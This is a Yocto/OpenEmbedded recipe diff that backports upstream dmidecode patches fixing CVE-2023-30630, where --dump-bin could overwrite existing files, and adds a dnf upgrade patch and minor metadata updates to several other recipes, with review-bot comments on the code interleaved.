diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
new file mode 100644
index 0000000000..f1d449acbe
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
@@ -0,0 +1,236 @@
+From 24def311c6168d0dfb7c5f0f183b72b709c49265 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:21 +0100
+Subject: [PATCH] dmidecode: Split table fetching from decoding
+
+Clean up function dmi_table so that it does only one thing:
+* dmi_table() is renamed to dmi_table_get(). It now retrieves the
+ DMI table, but does not process it any longer.
+* Decoding or dumping the table is now done in smbios3_decode(),
+ smbios_decode() and legacy_decode().
+No functional change.
+
+A side effect of this change is that writing the header and body of
+dump files is now done in a single location. This is required to
+further consolidate the writing of dump files.
+
+CVE-ID: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=39b2dd7b6ab7]
+
+Backport Changes:
+- In the file dmidecode.c, the commit [dd593d2] in v3.3 introduces
+ pr_info(). This is backported to printf() as per v3.2.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit 39b2dd7b6ab719b920e96ed832cfb4bdd664e808)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+---
+ dmidecode.c | 86 ++++++++++++++++++++++++++++++++++++++---------------
+ 1 file changed, 62 insertions(+), 24 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index a3e9d6c..d6eedd1 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -5211,8 +5211,9 @@ static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
+ }
+ }
+
+-static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+- u32 flags)
++/* Allocates a buffer for the table, must be freed by the caller */
++static u8 *dmi_table_get(off_t base, u32 *len, u16 num, u32 ver,
++ const char *devmem, u32 flags)
+ {
+ u8 *buf;
+
+@@ -5231,7 +5232,7 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ {
+ if (num)
+ printf("%u structures occupying %u bytes.\n",
+- num, len);
++ num, *len);
+ if (!(opt.flags & FLAG_FROM_DUMP))
+ printf("Table at 0x%08llX.\n",
+ (unsigned long long)base);
+@@ -5249,19 +5250,19 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ * would be the result of the kernel truncating the table on
+ * parse error.
+ */
+- size_t size = len;
++ size_t size = *len;
+ buf = read_file(flags & FLAG_NO_FILE_OFFSET ? 0 : base,
+ &size, devmem);
+- if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)len)
++ if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)*len)
+ {
+ fprintf(stderr, "Wrong DMI structures length: %u bytes "
+ "announced, only %lu bytes available.\n",
+- len, (unsigned long)size);
++ *len, (unsigned long)size);
+ }
+- len = size;
++ *len = size;
+ }
+ else
+- buf = mem_chunk(base, len, devmem);
++ buf = mem_chunk(base, *len, devmem);
+
+ if (buf == NULL)
+ {
+@@ -5271,15 +5272,9 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
+ fprintf(stderr,
+ "Try compiling dmidecode with -DUSE_MMAP.\n");
+ #endif
+- return;
+ }
+
+- if (opt.flags & FLAG_DUMP_BIN)
+- dmi_table_dump(buf, len);
+- else
+- dmi_table_decode(buf, len, num, ver >> 8, flags);
+-
+- free(buf);
++ return buf;
+ }
+
+
+@@ -5314,8 +5309,9 @@ static void overwrite_smbios3_address(u8 *buf)
+
+ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ {
+- u32 ver;
++ u32 ver, len;
+ u64 offset;
++ u8 *table;
+
+ /* Don't let checksum run beyond the buffer */
+ if (buf[0x06] > 0x20)
+@@ -5341,8 +5337,12 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ return 0;
+ }
+
+- dmi_table(((off_t)offset.h << 32) | offset.l,
+- DWORD(buf + 0x0C), 0, ver, devmem, flags | FLAG_STOP_AT_EOT);
++ /* Maximum length, may get trimmed */
++ len = DWORD(buf + 0x0C);
++ table = dmi_table_get(((off_t)offset.h << 32) | offset.l, &len, 0, ver,
++ devmem, flags | FLAG_STOP_AT_EOT);
++ if (table == NULL)
++ return 1;
+
+ if (opt.flags & FLAG_DUMP_BIN)
+ {
+@@ -5351,18 +5351,28 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_smbios3_address(crafted);
+
++ dmi_table_dump(table, len);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("# Writing %d bytes to %s.\n", crafted[0x06],
+ opt.dumpfile);
+ write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
+ }
++ else
++ {
++ dmi_table_decode(table, len, 0, ver >> 8,
++ flags | FLAG_STOP_AT_EOT);
++ }
++
++ free(table);
+
+ return 1;
+ }
+
+ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ {
+- u16 ver;
++ u16 ver, num;
++ u32 len;
++ u8 *table;
+
+ /* Don't let checksum run beyond the buffer */
+ if (buf[0x05] > 0x20)
+@@ -5402,8 +5412,13 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ printf("SMBIOS %u.%u present.\n",
+ ver >> 8, ver & 0xFF);
+
+- dmi_table(DWORD(buf + 0x18), WORD(buf + 0x16), WORD(buf + 0x1C),
+- ver << 8, devmem, flags);
++ /* Maximum length, may get trimmed */
++ len = WORD(buf + 0x16);
++ num = WORD(buf + 0x1C);
++ table = dmi_table_get(DWORD(buf + 0x18), &len, num, ver << 8,
++ devmem, flags);
++ if (table == NULL)
++ return 1;
+
+ if (opt.flags & FLAG_DUMP_BIN)
+ {
+@@ -5412,27 +5427,43 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_dmi_address(crafted + 0x10);
+
++ dmi_table_dump(table, len);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("# Writing %d bytes to %s.\n", crafted[0x05],
+ opt.dumpfile);
+ write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
+ }
++ else
++ {
++ dmi_table_decode(table, len, num, ver, flags);
++ }
++
++ free(table);
+
+ return 1;
+ }
+
+ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ {
++ u16 ver, num;
++ u32 len;
++ u8 *table;
++
+ if (!checksum(buf, 0x0F))
+ return 0;
+
++ ver = ((buf[0x0E] & 0xF0) << 4) + (buf[0x0E] & 0x0F);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("Legacy DMI %u.%u present.\n",
+ buf[0x0E] >> 4, buf[0x0E] & 0x0F);
+
+- dmi_table(DWORD(buf + 0x08), WORD(buf + 0x06), WORD(buf + 0x0C),
+- ((buf[0x0E] & 0xF0) << 12) + ((buf[0x0E] & 0x0F) << 8),
+- devmem, flags);
++ /* Maximum length, may get trimmed */
++ len = WORD(buf + 0x06);
++ num = WORD(buf + 0x0C);
++ table = dmi_table_get(DWORD(buf + 0x08), &len, num, ver << 8,
++ devmem, flags);
++ if (table == NULL)
++ return 1;
+
+ if (opt.flags & FLAG_DUMP_BIN)
+ {
+@@ -5441,11 +5472,18 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 16);
+ overwrite_dmi_address(crafted);
+
++ dmi_table_dump(table, len);
+ if (!(opt.flags & FLAG_QUIET))
+ printf("# Writing %d bytes to %s.\n", 0x0F,
+ opt.dumpfile);
+ write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
+ }
++ else
++ {
++ dmi_table_decode(table, len, num, ver, flags);
++ }
++
++ free(table);
+
+ return 1;
+ }
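Review bot: The patch header tags the issue as `CVE-ID: CVE-2023-30630`, while the two sibling dmidecode patches added in this commit use `CVE: CVE-2023-30630`. Tooling that scans patch headers for a `CVE:` tag may not match this spelling, although the file name still carries the CVE id, so the practical effect is uncertain. For consistent tracking and grepping the line should read `CVE: CVE-2023-30630`.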
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
new file mode 100644
index 0000000000..353c2553f5
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
@@ -0,0 +1,198 @@
+From 58e8a07b1aef0e53af1642b30248255e53e42790 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:25 +0100
+Subject: [PATCH] dmidecode: Write the whole dump file at once
+
+When option --dump-bin is used, write the whole dump file at once,
+instead of opening and closing the file separately for the table
+and then for the entry point.
+
+As the file writing function is no longer generic, it gets moved
+from util.c to dmidecode.c.
+
+One minor functional change resulting from the new implementation is
+that the entry point is written first now, so the messages printed
+are swapped.
+
+CVE: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=d8cfbc808f38]
+
+Backport Changes:
+- In the file dmidecode.c, the commit [2241f1d] in v3.3 introduces
+ pr_info(). This is backported to printf() as per v3.2.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit d8cfbc808f387e87091c25e7d5b8c2bb348bb206)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ dmidecode.c | 69 +++++++++++++++++++++++++++++++++++++++--------------
+ util.c | 40 -------------------------------
+ util.h | 1 -
+ 3 files changed, 51 insertions(+), 59 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index d6eedd1..b91e53b 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -5094,11 +5094,56 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
+ }
+ }
+
+-static void dmi_table_dump(const u8 *buf, u32 len)
++static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
++ u32 table_len)
+ {
++ FILE *f;
++
++ f = fopen(opt.dumpfile, "wb");
++ if (!f)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fopen");
++ return -1;
++ }
++
++ if (!(opt.flags & FLAG_QUIET))
++ printf("# Writing %d bytes to %s.\n", ep_len, opt.dumpfile);
++ if (fwrite(ep, ep_len, 1, f) != 1)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fwrite");
++ goto err_close;
++ }
++
++ if (fseek(f, 32, SEEK_SET) != 0)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fseek");
++ goto err_close;
++ }
++
+ if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", len, opt.dumpfile);
+- write_dump(32, len, buf, opt.dumpfile, 0);
++ printf("# Writing %d bytes to %s.\n", table_len, opt.dumpfile);
++ if (fwrite(table, table_len, 1, f) != 1)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fwrite");
++ goto err_close;
++ }
++
++ if (fclose(f))
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("fclose");
++ return -1;
++ }
++
++ return 0;
++
++err_close:
++ fclose(f);
++ return -1;
+ }
+
+ static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
+@@ -5351,11 +5396,7 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_smbios3_address(crafted);
+
+- dmi_table_dump(table, len);
+- if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", crafted[0x06],
+- opt.dumpfile);
+- write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
++ dmi_table_dump(crafted, crafted[0x06], table, len);
+ }
+ else
+ {
+@@ -5427,11 +5468,7 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 32);
+ overwrite_dmi_address(crafted + 0x10);
+
+- dmi_table_dump(table, len);
+- if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", crafted[0x05],
+- opt.dumpfile);
+- write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
++ dmi_table_dump(crafted, crafted[0x05], table, len);
+ }
+ else
+ {
+@@ -5472,11 +5509,7 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
+ memcpy(crafted, buf, 16);
+ overwrite_dmi_address(crafted);
+
+- dmi_table_dump(table, len);
+- if (!(opt.flags & FLAG_QUIET))
+- printf("# Writing %d bytes to %s.\n", 0x0F,
+- opt.dumpfile);
+- write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
++ dmi_table_dump(crafted, 0x0F, table, len);
+ }
+ else
+ {
+diff --git a/util.c b/util.c
+index eeffdae..2e1931c 100644
+--- a/util.c
++++ b/util.c
+@@ -247,46 +247,6 @@ out:
+ return p;
+ }
+
+-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add)
+-{
+- FILE *f;
+-
+- f = fopen(dumpfile, add ? "r+b" : "wb");
+- if (!f)
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fopen");
+- return -1;
+- }
+-
+- if (fseek(f, base, SEEK_SET) != 0)
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fseek");
+- goto err_close;
+- }
+-
+- if (fwrite(data, len, 1, f) != 1)
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fwrite");
+- goto err_close;
+- }
+-
+- if (fclose(f))
+- {
+- fprintf(stderr, "%s: ", dumpfile);
+- perror("fclose");
+- return -1;
+- }
+-
+- return 0;
+-
+-err_close:
+- fclose(f);
+- return -1;
+-}
+-
+ /* Returns end - start + 1, assuming start < end */
+ u64 u64_range(u64 start, u64 end)
+ {
+diff --git a/util.h b/util.h
+index 3094cf8..ef24eb9 100644
+--- a/util.h
++++ b/util.h
+@@ -27,5 +27,4 @@
+ int checksum(const u8 *buf, size_t len);
+ void *read_file(off_t base, size_t *len, const char *filename);
+ void *mem_chunk(off_t base, size_t len, const char *devmem);
+-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add);
+ u64 u64_range(u64 start, u64 end);
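Review bot: `dmi_table_dump()` now returns `int` and yields `-1` on every failure path, but the three call sites in `smbios3_decode()`, `smbios_decode()` and `legacy_decode()` discard the result and go on to `return 1` as if the dump had been written. Whether the process exit status ever reflects a failed dump cannot be seen from this patch; if it does not, scripts using `--dump-bin` will treat a missing or partial dump file as good. The result should be checked at each call site and the failure recorded so the program can exit non-zero. The two new messages also pass `u32` values to `%d`; `printf("# Writing %u bytes to %s.\n", ep_len, opt.dumpfile);` matches the type, and likewise for `table_len`.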
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
new file mode 100644
index 0000000000..bf4d060c8c
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
@@ -0,0 +1,62 @@
+From b7dacccff32294ea522df32a9391d0218e7600ea Mon Sep 17 00:00:00 2001
+From: Jean Delvare <jdelvare@suse.de>
+Date: Mon, 20 Feb 2023 14:53:31 +0100
+Subject: [PATCH] dmidecode: Do not let --dump-bin overwrite an existing file
+
+Make sure that the file passed to option --dump-bin does not already
+exist. In practice, it is rather unlikely that an honest user would
+want to overwrite an existing dump file, while this possibility
+could be used by a rogue user to corrupt a system file.
+
+CVE: CVE-2023-30630
+Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=6ca381c1247c]
+
+Backport Changes:
+- Ignored changes in man/dmidecode.8 file.
+
+Signed-off-by: Jean Delvare <jdelvare@suse.de>
+Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
+(cherry picked from commit 6ca381c1247c81f74e1ca4e7706f70bdda72e6f2)
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ dmidecode.c | 14 ++++++++++++--
+ 1 file changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/dmidecode.c b/dmidecode.c
+index b91e53b..846d9a1 100644
+--- a/dmidecode.c
++++ b/dmidecode.c
+@@ -60,6 +60,7 @@
+ * https://www.dmtf.org/sites/default/files/DSP0270_1.0.1.pdf
+ */
+
++#include <fcntl.h>
+ #include <stdio.h>
+ #include <string.h>
+ #include <strings.h>
+@@ -5097,13 +5098,22 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
+ static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
+ u32 table_len)
+ {
++ int fd;
+ FILE *f;
+
+- f = fopen(opt.dumpfile, "wb");
++ fd = open(opt.dumpfile, O_WRONLY|O_CREAT|O_EXCL, 0666);
++ if (fd == -1)
++ {
++ fprintf(stderr, "%s: ", opt.dumpfile);
++ perror("open");
++ return -1;
++ }
++
++ f = fdopen(fd, "wb");
+ if (!f)
+ {
+ fprintf(stderr, "%s: ", opt.dumpfile);
+- perror("fopen");
++ perror("fdopen");
+ return -1;
+ }
+
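Review bot: When `fdopen()` fails in dmi_table_dump, the `if (!f)` branch returns without closing `fd`, so the descriptor leaks and the empty file that `open(..., O_CREAT|O_EXCL, ...)` just created is left on disk. Because of `O_EXCL`, a retry with the same `--dump-bin` path would then be refused until the user removes that file by hand. Adding `close(fd);` before the `return -1;` in that branch fixes the leak, and an `unlink(opt.dumpfile);` there would also remove the stray file; both need `<unistd.h>`, and whether dmidecode.c already includes it is not visible here. This is a backport, so the change would best be raised upstream as well. The body of dmi_table_dump continues outside the hunk.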
diff --git a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
index 63f4061cb7..1e7c38dc8a 100644
--- a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
+++ b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
@@ -1,10 +1,14 @@
SUMMARY = "DMI (Desktop Management Interface) table related utilities"
HOMEPAGE = "http://www.nongnu.org/dmidecode/"
+DESCRIPTION = "Dmidecode reports information about your system's hardware as described in your system BIOS according to the SMBIOS/DMI standard (see a sample output)."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263"
SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/dmidecode/${BP}.tar.xz \
file://0001-Committing-changes-from-do_unpack_extra.patch \
+ file://CVE-2023-30630-dependent_p1.patch \
+ file://CVE-2023-30630-dependent_p2.patch \
+ file://CVE-2023-30630.patch \
"
COMPATIBLE_HOST = "(i.86|x86_64|aarch64|arm|powerpc|powerpc64).*-linux"
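Review bot: The new `DESCRIPTION` ends with "(see a sample output)", which reads like link text copied from a web page and points at nothing inside recipe metadata. Dropping the parenthetical leaves the sentence complete: `DESCRIPTION = "Dmidecode reports information about your system's hardware as described in your system BIOS according to the SMBIOS/DMI standard."`.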
diff --git a/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
new file mode 100644
index 0000000000..57c2375a54
--- /dev/null
+++ b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
@@ -0,0 +1,60 @@
+From c88a77198c0156e425c2725f30e481207de5162f Mon Sep 17 00:00:00 2001
+From: Jaroslav Mracek <jmracek@redhat.com>
+Date: Tue, 3 Sep 2019 11:01:51 +0200
+Subject: [PATCH] Keep installed packages in upgrade job
+ (RhBug:1728252,1644241,1741381)
+
+In combination with marking of job as TARGETED it prevents from
+reinstalling of modified packages with same NEVRA.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1728252
+https://bugzilla.redhat.com/show_bug.cgi?id=1644241
+https://bugzilla.redhat.com/show_bug.cgi?id=1741381
+
+Closes: #1474
+Approved by: m-blaha
+
+
+Backport to fix bug in dnf in oe-core
+from https://github.com/rpm-software-management/dnf
+
+Removed spec file portion of patch
+
+Upstream-Status: Backport
+Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
+---
+ dnf.spec | 4 ++--
+ dnf/base.py | 3 ---
+ dnf/module/module_base.py | 2 +-
+ 3 files changed, 3 insertions(+), 6 deletions(-)
+
+diff --git a/dnf/base.py b/dnf/base.py
+index b2ced61..628c154 100644
+--- a/dnf/base.py
++++ b/dnf/base.py
+@@ -1968,9 +1968,6 @@ class Base(object):
+ obsoletes=q.installed().union(q.upgrades()))
+ # add obsoletes into transaction
+ q = q.union(obsoletes)
+- # provide only available packages to solver otherwise selection of available
+- # possibilities will be ignored
+- q = q.available()
+ if reponame is not None:
+ q.filterm(reponame=reponame)
+ q = self._merge_update_filters(q, pkg_spec=pkg_spec)
+diff --git a/dnf/module/module_base.py b/dnf/module/module_base.py
+index 976d730..ce70f63 100644
+--- a/dnf/module/module_base.py
++++ b/dnf/module/module_base.py
+@@ -214,7 +214,7 @@ class ModuleBase(object):
+
+ if not upgrade_package_set:
+ logger.error(_("Unable to match profile in argument {}").format(spec))
+- query = self.base.sack.query().available().filterm(name=upgrade_package_set)
++ query = self.base.sack.query().filterm(name=upgrade_package_set)
+ if query:
+ sltr = dnf.selector.Selector(self.base.sack)
+ sltr.set(pkg=query)
+--
+2.7.4
+
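Review bot: The patch header says only `Upstream-Status: Backport`, with no commit reference, so the backport cannot be checked against the upstream change without searching the dnf history. A bracketed reference such as `Upstream-Status: Backport [https://github.com/rpm-software-management/dnf/commit/<upstream-commit-id>]` would make it traceable. The diffstat also still lists `dnf.spec` and "3 files changed", although the message says the spec portion was removed and only two file diffs follow. Regenerating or trimming the diffstat would keep the header consistent with the content.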
diff --git a/meta/recipes-devtools/dnf/dnf_4.2.2.bb b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
index a046ffc05d..6b6b233d6d 100644
--- a/meta/recipes-devtools/dnf/dnf_4.2.2.bb
+++ b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
@@ -2,12 +2,13 @@ SUMMARY = "Package manager forked from Yum, using libsolv as a dependency resolv
DESCRIPTION = "Software package manager that installs, updates, and removes \
packages on RPM-based Linux distributions. It automatically computes \
dependencies and determines the actions required to install packages."
+HOMEPAGE = "https://github.com/rpm-software-management/dnf"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \
"
-SRC_URI = "git://github.com/rpm-software-management/dnf.git \
+SRC_URI = "git://github.com/rpm-software-management/dnf.git;branch=master;protocol=https \
file://0001-Corretly-install-tmpfiles.d-configuration.patch \
file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \
file://0005-Do-not-prepend-installroot-to-logdir.patch \
@@ -15,6 +16,7 @@ SRC_URI = "git://github.com/rpm-software-management/dnf.git \
file://0030-Run-python-scripts-using-env.patch \
file://Fix-SyntaxWarning.patch \
file://0001-set-python-path-for-completion_helper.patch \
+ file://0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch \
"
SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d"
diff --git a/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb b/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
index e4ab113391..4bd4aef099 100644
--- a/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
+++ b/meta/recipes-devtools/dosfstools/dosfstools_4.1.bb
@@ -22,7 +22,7 @@ EXTRA_OECONF = "--without-udev --enable-compat-symlinks"
CFLAGS += "-D_GNU_SOURCE -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
# Add codepage437 to avoid error from `dosfsck -l`
RRECOMMENDS_${PN}_append_libc-glibc = " glibc-gconv-ibm437"
diff --git a/meta/recipes-devtools/dpkg/dpkg.inc b/meta/recipes-devtools/dpkg/dpkg.inc
index 1c3c585d79..f008959d77 100644
--- a/meta/recipes-devtools/dpkg/dpkg.inc
+++ b/meta/recipes-devtools/dpkg/dpkg.inc
@@ -1,5 +1,7 @@
SUMMARY = "Package maintenance system from Debian"
LICENSE = "GPLv2.0+"
+HOMEPAGE = "https://salsa.debian.org/dpkg-team/dpkg"
+DESCRIPTION = "The primary interface for the dpkg suite is the dselect program. A more low-level and less user-friendly interface is available in the form of the dpkg command."
SECTION = "base"
DEPENDS = "zlib bzip2 perl ncurses"
diff --git a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
index e9dec337b3..9e6e9f2464 100644
--- a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb
+++ b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
@@ -18,5 +18,5 @@ SRC_URI_append_class-native = " \
file://tweak-options-require-tar-1.27.patch \
"
-SRC_URI[md5sum] = "60f57c5494e6dfa177504d47bfa0e383"
-SRC_URI[sha256sum] = "4c27fededf620c0aa522fff1a48577ba08144445341257502e7730f2b1a296e8"
+SRC_URI[md5sum] = "9d170c8baa1aa36b09698c909f304508"
+SRC_URI[sha256sum] = "2632c00b0cf0ea19ed7bd6700e6ec5faca93f0045af629d356dc03ad74ae6f10"
diff --git a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
index 2c843a9342..56b52d6a47 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
+++ b/meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb
@@ -1,4 +1,5 @@
SUMMARY = "A small utility for printing debug source file locations embedded in binaries"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://../dwarfsrcfiles.c;md5=31483894e453a77acbb67847565f1b5c;beginline=1;endline=8"
diff --git a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
index af7af524eb..9eb5ca807a 100644
--- a/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
+++ b/meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c
@@ -9,6 +9,7 @@
#include <argp.h>
#include <stdio.h>
+#include <stdlib.h>
#include <dwarf.h>
#include <elfutils/libdw.h>
@@ -83,13 +84,15 @@ process_cu (Dwarf_Die *cu_die)
int
main (int argc, char **argv)
{
- char* args[3];
+ char* args[5];
int res = 0;
Dwfl *dwfl;
Dwarf_Addr bias;
- if (argc != 2)
+ if (argc != 2) {
fprintf(stderr, "Usage %s <file>", argv[0]);
+ exit(EXIT_FAILURE);
+ }
// Pretend "dwarfsrcfiles -e <file>" was given, so we can use standard
// dwfl argp parser to open the file for us and get our Dwfl. Useful
@@ -98,8 +101,12 @@ main (int argc, char **argv)
args[0] = argv[0];
args[1] = "-e";
args[2] = argv[1];
+ // We don't want to follow debug linked files due to the way OE processes
+ // files, could race against changes in the linked binary (e.g. objcopy on it)
+ args[3] = "--debuginfo-path";
+ args[4] = "/not/exist";
- argp_parse (dwfl_standard_argp (), 3, args, 0, NULL, &dwfl);
+ argp_parse (dwfl_standard_argp (), 5, args, 0, NULL, &dwfl);
Dwarf_Die *cu = NULL;
while ((cu = dwfl_nextcu (dwfl, cu, &bias)) != NULL)
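Review bot: The argument count passed to argp_parse is the literal `5`, which has to be kept in step by hand with the `char* args[5];` declaration changed in the previous hunk. `argp_parse (dwfl_standard_argp (), sizeof args / sizeof args[0], args, 0, NULL, &dwfl);` removes that coupling. The return value of argp_parse is still ignored and `dwfl` is declared without an initializer, so if parsing ever returned an error instead of exiting, dwfl_nextcu would receive an indeterminate pointer. Declaring `Dwfl *dwfl = NULL;` and checking the result would make that path explicit. The body of main continues outside the hunk.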
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
index 009f5ed807..57e4665a34 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc
@@ -3,7 +3,7 @@ DESCRIPTION = "The Ext2 Filesystem Utilities (e2fsprogs) contain all of the stan
fixing, configuring , and debugging ext2 filesystems."
HOMEPAGE = "http://e2fsprogs.sourceforge.net/"
-LICENSE = "GPLv2 & LGPLv2 & BSD & MIT"
+LICENSE = "GPLv2 & LGPLv2 & BSD-3-Clause & MIT"
LICENSE_e2fsprogs-dumpe2fs = "GPLv2"
LICENSE_e2fsprogs-e2fsck = "GPLv2"
LICENSE_e2fsprogs-mke2fs = "GPLv2"
@@ -19,7 +19,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=d50be0580c0b0a7fbc7a4830bbe6c12b \
SECTION = "base"
DEPENDS = "util-linux attr"
-SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git"
+SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master"
S = "${WORKDIR}/git"
